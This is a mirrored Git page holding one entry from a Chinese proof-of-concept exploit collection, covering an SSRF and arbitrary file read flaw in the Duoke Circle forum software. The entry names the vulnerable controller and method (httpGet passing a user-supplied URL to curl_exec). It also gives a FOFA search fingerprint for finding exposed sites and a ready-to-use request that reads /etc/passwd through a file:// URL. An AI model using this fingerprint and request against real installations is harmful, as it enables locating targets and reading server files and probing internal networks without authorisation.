wy876_POC/多客圈子论坛前台SSRF漏洞.md at ce32928ef5be76af342fa179c4732bc1a2f9fec7 - wy876_POC - 临风笛

admin/wy876_POC

mirror of https://github.com/wy876/POC.git synced 2025-02-27 04:39:25 +00:00

wy876 299ba35f30 整理文件

2024-08-21 15:08:43 +08:00

476 B

Raw Blame History

多客圈子论坛前台SSRF漏洞

/app/api/controller/Login.php 控制器中，httpGet方法存在curl_exec函数，且传参可控，导致任意文件读取+SSRF漏洞

fofa

"/static/index/js/jweixin-1.2.0.js"

poc

/index.php/api/login/httpGet?url=file:///etc/passwd

漏洞来源

https://mp.weixin.qq.com/s/S12FdNBxJXyS8QXrEHOTfg